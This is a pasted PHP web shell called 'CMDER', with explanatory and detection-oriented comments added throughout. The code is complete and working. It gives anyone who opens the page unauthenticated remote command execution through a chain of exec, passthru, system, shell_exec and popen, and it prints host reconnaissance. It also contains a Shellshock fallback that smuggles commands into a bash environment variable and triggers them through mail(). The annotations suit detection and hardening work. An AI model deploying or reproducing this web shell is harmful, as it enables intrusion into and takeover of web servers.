inj3ctor_m4

CMDER

Dec 7th, 2014
  1. <title>Made In Morocco</title>
      <!-- Static banner markup sent before any PHP runs. The fixed strings in
           this header (the page title and the "#CMDER WEBSHELL" heading) do not
           depend on the request, so they can serve as content signatures when
           scanning a web root or HTTP responses for this file. -->
  2. <style>
  3. input,select,textarea {
  4.     border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
  5. }
  6. </style>
  7. <center>
  8. <table border='1' width='%70' cellpadding='5'>
  9. <tr><td align='center'><i><b><font size='2' face='Courier'>#CMDER WEBSHELL</font></b></i></td></tr>
      <!-- The image below is hot-linked from a third-party host, so it is the
           viewer's browser, not this server, that requests it when the page
           is opened. -->
  10. <tr><td align='center'><img src="https://powersthatbeat.files.wordpress.com/2011/05/photo8.jpg"></td></tr>
  11. <?php
      // Top-level request handler of a web shell: it changes directory on
      // request, prints host details, and passes a posted string to m4Ex()
      // for execution as an OS command with the privileges of the PHP process.
      // Nothing in this listing authenticates or restricts the caller, so
      // anyone who can reach the URL gets the same access.
      // The author's own comments and marker strings are left verbatim below
      // because they are useful static-detection strings.
  12. #CMDER // BY INJ3CTOR_M4
      // Lift the execution time limit and switch PHP error reporting off for
      // this request, so failures in the calls below are not reported.
  13. set_time_limit(0);
  14. error_reporting(0);
  15.  
  16. // FILE MANAGER
      // Despite the label, this only changes the working directory to the
      // trimmed `path` query parameter; the value is not validated and the
      // result of chdir() is not checked. Because `path` travels in the query
      // string, it normally appears in web access logs.
  17. if(!empty($_GET['path'])) {
  18.     $cmd = trim($_GET['path']);
  19.     chdir($cmd);
  20. }
  21.  
  22. // CMDER DESGIN
      // Host reconnaissance rendered into the page: php_uname() output, the
      // current working directory (shown twice, once as the default of the
      // `path` form field) and the disable_functions setting. None of the
      // values is HTML-escaped before being echoed.
  23. echo'<tr><td align="center"><b><font size="2" face="Courier">UNAME:</b> '.php_uname().'</font></td></tr>';
  24. echo'<tr><td align="center"><b><font size="2" face="Courier">PWD:</b> '.getcwd().'</font><form method="GET">
  25. <input type="text" name="path" value="'.getcwd().'">
  26. <input type="submit" value="CHANGE">
  27. </form><font size="2" face="Courier"><b>DISABLE_FUNCTION:</b> <u>'.@showdisablefunctions().'</u></font></td></tr>';
      // Command form. It submits by POST, so the `Command` value is carried in
      // the request body; presumably it is absent from default access logs
      // (confirm against the server's logging configuration), which makes
      // request-body logging or process-level telemetry the better source.
  28. echo'<tr><td align="center">
  29. <form method="POST">
  30. <font size="2" face="Courier">Command:</font><br />
  31. <input type="text" size="30" name="Command" value="uname -a">
  32. <input type="submit" value="EXEC">
  33. </form>
  34. </td></tr>';
      // A non-empty `Command` is trimmed and handed unchanged to m4Ex(); what
      // comes back is echoed raw inside a <textarea>. The <tr><td> opened here
      // is never closed.
  35. if(!empty($_POST['Command'])) {
  36.     $cmd = trim($_POST['Command']);
  37.     echo'<tr><td align="center">';
  38.     echo'<textarea style="width: 926px; height: 382px;">';
  39.     echo m4Ex($cmd);
  40.     echo'</textarea><br />';
  41. }
  42. echo'<tr><td align="center"><font size="6" color="#051F53">MOROCCAN HAXORZ</font></td></tr>';
  43.  
  44. // FUNCTIONS
  45. function showdisablefunctions() {
      // Reports the PHP `disable_functions` ini setting as an HTML fragment.
      // Returns the configured list in red when the setting is non-empty, or
      // the word NONE in green when ini_get() yields an empty/false value
      // (the assignment inside the condition is then falsy). The NONE branch
      // emits one extra closing </b>.
      // Defender note: this is a read-only probe of the host's hardening; the
      // value it displays is the same list an administrator would review to
      // see which process-spawning functions are blocked.
  46. if ($disablefunc=@ini_get("disable_functions")){
  47.     return "<font color=red><b>".$disablefunc."</b></font>";
  48. }else{
  49.     return "<font color=green><b>NONE</b></b></font>";
  50. }
  51. }
  52.  
  53. function m4Ex($in) {
          // Runs the string $in as an OS command and returns whatever output
          // was captured. The branches form a fallback chain selected only by
          // whether each PHP function exists: exec, passthru, system,
          // shell_exec, popen, and finally shellshock(). Exactly one branch
          // runs; an empty result does not trigger the next one.
          // Defender note: the chain shows why a partial disable_functions
          // list is not sufficient, since blocking one of these leaves the
          // others usable. Child processes spawned by the web server or PHP
          // worker are the common runtime signal for every branch.
  54.     $out = '';
  55.     if (function_exists('exec')) {
              // exec() fills $out with an array of output lines, which are
              // then joined back with newlines.
  56.         @exec($in,$out);
  57.         $out = @join("\n",$out);
  58.     } elseif (function_exists('passthru')) {
              // passthru() writes straight to the output stream, so it is
              // wrapped in an output buffer to capture the text.
  59.         ob_start();
  60.         @passthru($in);
  61.         $out = ob_get_clean();
  62.     } elseif (function_exists('system')) {
              // Same buffering approach for system().
  63.         ob_start();
  64.         @system($in);
  65.         $out = ob_get_clean();
  66.     } elseif (function_exists('shell_exec')) {
  67.         $out = shell_exec($in);
  68.     } elseif (is_resource($f = @popen($in,"r"))) {
              // popen() read pipe, drained in 1024-byte chunks until EOF.
  69.         $out = "";
  70.         while(!@feof($f))
  71.             $out .= fread($f,1024);
  72.         pclose($f);
  73.     } else {
              // Last resort when none of the functions above is usable.
  74.         $out = shellshock($in);
  75.     }
  76.     return $out;
  77. }
  78.  
  79. function shellshock($cmd) {
          // Fallback execution path used by m4Ex() when exec, passthru, system,
          // shell_exec and popen are all unavailable. It relies on the bash
          // environment-variable function-import bug this function is named
          // after, and only proceeds when /bin/sh is a symlink whose target
          // contains "bash".
          // Returns the captured output, "Not vuln (not bash)" when the symlink
          // check fails, or "No output, or not vuln." when the temp file ends
          // up empty or unreadable.
          // Defender note: on a host whose bash no longer imports function
          // definitions from arbitrary environment variables, this path ends in
          // the "No output, or not vuln." branch. It needs putenv() and mail(),
          // so those belong on the same disable_functions review list as the
          // functions tried in m4Ex(). Artefacts to look for: a short-lived file
          // with the prefix "data" in the script's working directory, and the
          // environment variable name PHP_LOL.
  80.     if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
              // tempnam() creates the capture file in the current directory.
  81.         $tmp = tempnam(".","data");
              // The environment value is shaped like an exported bash function
              // followed by the command, with stdout and stderr redirected
              // into the temp file.
  82.         putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
              // mail() is given an empty subject, body and headers plus the
              // extra sendmail argument "-bv"; it appears to be called only so
              // that PHP launches the configured mail command while PHP_LOL is
              // in the environment (TODO confirm against the host's
              // sendmail_path). The recipient literal reads like an
              // e-mail-protection placeholder, presumably substituted when the
              // paste was rendered rather than written by the author.
  83.         mail("[email protected]","","","","-bv");
  84.     }
  85.     else return "Not vuln (not bash)";
          // Read back whatever landed in the temp file, then delete it; both
          // calls have their errors suppressed.
  86.     $output = @file_get_contents($tmp);
  87.     @unlink($tmp);
  88.     if($output != "") return $output;
  89.     else return "No output, or not vuln.";
  90. }
  91. ?>